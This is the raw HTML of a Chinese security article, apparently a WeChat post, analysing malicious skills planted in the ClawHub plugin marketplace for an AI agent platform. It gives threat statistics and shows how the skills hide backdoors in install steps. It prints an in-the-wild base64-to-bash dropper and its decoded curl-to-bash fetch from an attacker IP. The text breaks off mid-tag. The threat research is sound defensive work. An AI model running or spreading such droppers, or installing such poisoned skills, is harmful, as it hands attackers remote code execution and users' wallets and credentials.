src="https://wechat2rss.xlab.app/img-proxy/?k=c3a16e96&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F8GbHk6zNbA7ZTsrxmakzwpK8Gdqib9rVft8Kw8ibibqHvlPbvp7GSHmJkKUEdBHycciaLW0M2ZrSiaBeSjiaCsdsEIoQ%2F640"/></p></div></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="title" mpa-from-tpl="t" data-mpa-action-id="malup26b5lj"><div style="display: flex;justify-content: center;align-items: center;width: 100%;padding-top: 6px;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: center;align-items: center;" data-mid="" mpa-from-tpl="t" data-pm-slice="4 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;title&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;malup26b5lj&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;display: flex;justify-content: center;align-items: center;width: 100%;padding-top: 6px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div data-mid="" mpa-from-tpl="t" style="background: url(&#34;https://wechat2rss.xlab.app/img-proxy/?k=b569c320&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FOxjH4akCU4SJwFnCk5AB06C08aMkeicKSiczhngyibWGvunYAq1owNQaWqJcDHtYylpGm8n05D4WwyicnCIRGZlNfQ%2F640&#34;) no-repeat;background-size: 31px 26px;width: 31px;height: 26px;text-align: center;padding-right: 3px;margin-right: -24px;margin-top: -12px;z-index: 1;"><p style="font-size: 14px;font-family: PingFangSC-Regular, PingFang SC;color: #FFFFFF;line-height: 19px;" data-mid=""><span leaf="">01</span></p></div><div style="background: #EFF2FF;border-radius: 0px 61px 61px 0px;height: 32px;" data-mid="" mpa-from-tpl="t"><p style="padding: 0px 15px 0px 27px;font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #5171FF;line-height: 32px;letter-spacing: 2px;" data-mid=""><span leaf=""><span textstyle="" style="font-size: 18px;">系统架构与攻击面分析</span></span></p></div></div></div></div><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="margin-top: 0px;margin-bottom: 0px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;font-weight: bold;">控制台UI（Web 前端）：</span><span textstyle="" style="font-size: 14px;">用于技能管理、对话控制、Agent 调度等；</span></span></p></li><li><p style="margin-top: 0px;margin-bottom: 0px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;font-weight: bold;">网关接口模块（Gateway）：</span><span textstyle="" style="font-size: 14px;">提供 WebSocket/HTTP 接口供前端与后端通信；</span></span></p></li><li><p style="margin-top: 0px;margin-bottom: 0px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;font-weight: bold;">技能模块（Skills）：</span><span textstyle="" style="font-size: 14px;">运行脚本化功能扩展，可通过远程或本地安装；</span></span></p></li><li><p style="margin-top: 0px;margin-bottom: 0px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;font-weight: bold;">智能体模块（Agent）：</span><span textstyle="" style="font-size: 14px;">调度子任务执行、插件调用等；</span></span></p></li><li><p style="margin-top: 0px;margin-bottom: 0px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;font-weight: bold;">插件沙箱环境：</span><span textstyle="" style="font-size: 14px;">运行命令、Python 脚本、NodeJS 等。 </span></span></p></li></ul><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.6666666666666666" data-s="300,640" data-type="png" data-w="1536" style="width:100%;" type="block" data-backw="578" data-backh="385" data-imgfileid="100027369" src="https://wechat2rss.xlab.app/img-proxy/?k=175da7c5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FjHUbrwW0VwVHibueSlDm2glgKuDwduABujzN0rUWNZh67wY02YNNLKm5Z507wd8EtgrxUoE5kkiaXuE4OMPyiceQsZ3A5iaIz1Yehd5ADhhavZg%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="title" mpa-from-tpl="t" data-mpa-action-id="malup26b5lj"><div style="display: flex;justify-content: center;align-items: center;width: 100%;padding-top: 6px;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: center;align-items: center;" data-mid="" mpa-from-tpl="t" data-pm-slice="4 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;title&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;malup26b5lj&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;display: flex;justify-content: center;align-items: center;width: 100%;padding-top: 6px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div data-mid="" mpa-from-tpl="t" style="background: url(&#34;https://wechat2rss.xlab.app/img-proxy/?k=b569c320&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FOxjH4akCU4SJwFnCk5AB06C08aMkeicKSiczhngyibWGvunYAq1owNQaWqJcDHtYylpGm8n05D4WwyicnCIRGZlNfQ%2F640&#34;) no-repeat;background-size: 31px 26px;width: 31px;height: 26px;text-align: center;padding-right: 3px;margin-right: -24px;margin-top: -12px;z-index: 1;"><p style="font-size: 14px;font-family: PingFangSC-Regular, PingFang SC;color: #FFFFFF;line-height: 19px;" data-mid=""><span leaf="">02</span></p></div><div style="background: #EFF2FF;border-radius: 0px 61px 61px 0px;height: 32px;" data-mid="" mpa-from-tpl="t"><p style="padding: 0px 15px 0px 27px;font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #5171FF;line-height: 32px;letter-spacing: 2px;" data-mid=""><span leaf=""><span textstyle="" style="font-size: 18px;">在野攻击案例分析</span></span></p></div></div></div></div><p style="margin-top: 0px;margin-bottom: 0px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">    近期捕获的一类典型攻击方式，是攻击者通过</span></span><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;color: rgb(0, 82, 255);font-weight: bold;">构造并上传恶意技能（Skill）至 ClawHub 插件社区</span></span></span><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">，诱导用户安装并执行。我们对平台技能库进行爬取与自动化审计后发现，攻击者往往伪装为“浏览器自动化助手、社交平台代理、财经/办公插件”等热门类别，通过</span></span></span><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;color: rgb(0, 82, 255);font-weight: bold;">克隆官方页面结构与文件命名模式</span></span></span><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">，仅在安装说明或初始化脚本中植入后门逻辑，从而绕过用户与平台的人工审核。</span></span></span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="margin-top: 16px;margin-bottom: 0px;"><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="font-size: 14px;">左图为原始版本；右图为攻击者重新发布、嵌入后门的版本。</span></span></span></p></li></ul><p style="margin-top: 0px;margin-bottom: 0px;"><span leaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.4806312769010043" data-s="300,640" data-type="png" data-w="2788" style="width:100%;" type="block" data-backw="578" data-backh="278" data-imgfileid="100027371" src="https://wechat2rss.xlab.app/img-proxy/?k=714bb94b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FjHUbrwW0VwUUZ8lKFtPyB5yrPXfk2udscoic98Rx7RceuricEgO4RC94VHJstV3gCW0vQvR0t1bR8mIm0NpnLBffGBmfWxICbu44ehThG7siaM%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></p><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-data-temp-type="title" mpa-from-tpl="t" data-mpa-action-id="malup26b5lj"><div style="display: flex;justify-content: center;align-items: center;width: 100%;padding-top: 6px;" data-mid="" mpa-from-tpl="t"><div style="display: flex;justify-content: center;align-items: center;" data-mid="" mpa-from-tpl="t" data-pm-slice="4 4 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;data-mpa-template&#34;:&#34;t&#34;,&#34;mpa-data-temp-power-by&#34;:&#34;yiban.io&#34;,&#34;mpa-data-temp-type&#34;:&#34;title&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;,&#34;data-mpa-action-id&#34;:&#34;malup26b5lj&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;display: flex;justify-content: center;align-items: center;width: 100%;padding-top: 6px;&#34;,&#34;data-mid&#34;:&#34;&#34;,&#34;mpa-from-tpl&#34;:&#34;t&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><div data-mid="" mpa-from-tpl="t" style="background: url(&#34;https://wechat2rss.xlab.app/img-proxy/?k=b569c320&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FOxjH4akCU4SJwFnCk5AB06C08aMkeicKSiczhngyibWGvunYAq1owNQaWqJcDHtYylpGm8n05D4WwyicnCIRGZlNfQ%2F640&#34;) no-repeat;background-size: 31px 26px;width: 31px;height: 26px;text-align: center;padding-right: 3px;margin-right: -24px;margin-top: -12px;z-index: 1;"><p style="font-size: 14px;font-family: PingFangSC-Regular, PingFang SC;color: #FFFFFF;line-height: 19px;" data-mid=""><span leaf="">03</span></p></div><div style="background: #EFF2FF;border-radius: 0px 61px 61px 0px;height: 32px;" data-mid="" mpa-from-tpl="t"><p style="padding: 0px 15px 0px 27px;font-size: 16px;font-family: PingFangSC-Semibold, PingFang SC;font-weight: bold;color: #5171FF;line-height: 32px;letter-spacing: 2px;" data-mid=""><span leaf=""><span textstyle="" style="font-size: 18px;">恶意Skill分析</span></span></p></div></div></div></div><p style="text-align: left;margin: 3pt 0pt;text-indent: 2em;" data-pm-slice="0 0 []" data-mpa-action-id="mfm7wjvznd7"><span style="font-size: 11pt;font-weight: normal;font-style: normal;color: rgb(0, 0, 0);letter-spacing: 0pt;vertical-align: baseline;" data-font-family="default"><span leaf="" mpa-font-style="mfm7wjvk15o1" style="font-size: 14px;"><span textstyle="" style="font-size: 14px;">我们全量下载了截至2026.2.3日clawhub上面可以公开获取的3107个skill样本，命中潜在威胁skills 295 个，占比 9.49%，</span><span textstyle="" style="font-size: 14px;color: rgb(0, 82, 255);font-weight: bold;">接近10%的比例算得上是触目惊心</span><span textstyle="" style="font-size: 14px;">。统计分类如下：</span></span></span></p><table style="border-collapse:collapse;border:none;table-layout:fixed;mso-table-layout-alt:fixed;width:477px;"><tbody><tr style="height:27px;"><td data-colwidth="195" width="304" style="box-sizing:border-box;vertical-align:middle;padding:10px;border-width:0.833333px;border-style:solid;border-color:rgb(239, 239, 239);background-color:#ebe9e9;"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">风险类型</span></span></span></p></td><td data-colwidth="129" width="79" style="box-sizing:border-box;vertical-align:middle;padding:10px;border-width:0.833333px;border-style:solid;border-color:rgb(239, 239, 239);background-color:#ebe9e9;"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">命中数量</span></span></span></p></td><td data-colwidth="153" width="225" style="box-sizing:border-box;vertical-align:middle;padding:10px;border-width:0.833333px;border-style:solid;border-color:rgb(239, 239, 239);background-color:#ebe9e9;"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;font-weight: bold;">占比</span></span></span></p></td></tr><tr style="height:27px;"><td data-colwidth="195" width="304" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">下载执行</span></span></span></p></td><td data-colwidth="129" width="79" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">154</span></span></span></p></td><td data-colwidth="153" width="225" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">4.96%</span></span></span></p></td></tr><tr style="height:27px;"><td data-colwidth="195" width="304" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">Web3 钱包疑似外传</span></span></span></p></td><td data-colwidth="129" width="79" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">131</span></span></span></p></td><td data-colwidth="153" width="225" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">4.22%</span></span></span></p></td></tr><tr style="height:27px;"><td data-colwidth="195" width="304" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">数据外传 / 凭据风险</span></span></span></p></td><td data-colwidth="129" width="79" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">28</span></span></span></p></td><td data-colwidth="153" width="225" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">0.90%</span></span></span></p></td></tr><tr style="height:27px;"><td data-colwidth="195" width="304" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">持久化</span></span></span></p></td><td data-colwidth="129" width="79" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">21</span></span></span></p></td><td data-colwidth="153" width="225" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">0.68%</span></span></span></p></td></tr><tr style="height:27px;"><td data-colwidth="195" width="304" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">反弹 Shell</span></span></span></p></td><td data-colwidth="129" width="79" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align:left;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-family:PingFang SC;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">2</span></span></span></p></td><td data-colwidth="153" width="225" style="box-sizing: border-box;vertical-align: middle;padding: 10px;border-width: 0.833333px;border-style: solid;border-color: rgb(239, 239, 239);"><p style="text-align: left;margin: 0px 0pt;"><span style="font-size: 11pt;font-family: &#34;PingFang SC&#34;;font-weight: normal;font-style: normal;color: rgb(0, 0, 0);letter-spacing: 0pt;vertical-align: baseline;" data-font-family="PingFang SC"><span leaf=""><span textstyle="" style="font-size: 14px;">0.06%</span></span></span></p></td></tr></tbody></table><h3 style="text-align:left;line-height:1.7;margin-top:0pt;margin-bottom:0pt;margin-left:0pt;margin-right:0pt;" data-pm-slice="0 0 []"><span style="font-size:14pt;font-weight:bold;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 16px;color: rgb(0, 82, 255);">1. 统一投放模板：下载木马执行</span></span></span></h3><p style="text-align: left;line-height: 1.3;margin: 3pt 0pt;text-indent: 2em;"><span style="font-size: 11pt;font-weight: normal;font-style: normal;color: rgb(0, 0, 0);letter-spacing: 0pt;vertical-align: baseline;" data-font-family="default"><span leaf=""><span textstyle="" style="font-size: 14px;">在多个在野样本中，攻击者并未直接写明远程执行命令，而是采用如下统一模板：</span></span></span></p><pre style="padding:10px;background-color:#fafafa;border:1px solid #e1e1e1;border-radius:2px;overflow-x: scroll;"><code style="background-color: inherit;" data-tco-code-type="bash"><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#669900;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">echo </span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#669900;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">&#39;&lt;base64&gt;&#39; </span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#9A6E3A;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">|</span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf=""> base64 -D </span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#9A6E3A;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">| </span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#DD4A68;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">bash</span></span></code></pre><p style="text-align:left;line-height:1.3;margin-top:3pt;margin-bottom:3pt;margin-left:0pt;margin-right:0pt;"><span style="font-size:11pt;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="default"><span leaf="">对其进行解码后，实际执行内容为：</span></span></p><pre style="padding:10px;background-color:#fafafa;border:1px solid #e1e1e1;border-radius:2px;overflow-x: scroll;"><code style="background-color: inherit;" data-tco-code-type="bash"><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#000000;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">/bin/bash -c </span></span><span style="font-size:10.5pt;font-family:Monaco;font-weight:normal;font-style:normal;color:#669900;letter-spacing:0pt;mso-font-width:100%;vertical-align:baseline;" data-font-family="Monaco"><span leaf="">&#34;$(curl -fsSL <a href="http://91.92.242[.]30/" target="_blank">http://91.92.242[.]30/</a>&lt;path&gt;)&#34;</span></span></code></pre><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1764018691588785" data-s="300,640" data-type="png" data-w="1712" style="width:100%;" type="block" data-backw="578" data-backh="102" data-imgfileid="100027376" src="https://wechat2rss.xlab.app/img-proxy/?k=b3e022ff&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FjHUbrwW0VwU2Mxn6IeWQ5m9Kz4d1eq3eKGBicuZqdQtZA52PAI3sZLRia9vKEyn7FI64Pxj4iaBfzzOdg6ibSExvWkNy1RQcCOa8s1fepjpibKTQ%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="margin-bottom: 0px;margin-top: 0px;" data-pm-slice="0 0 []"><span data-font-family="default"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft 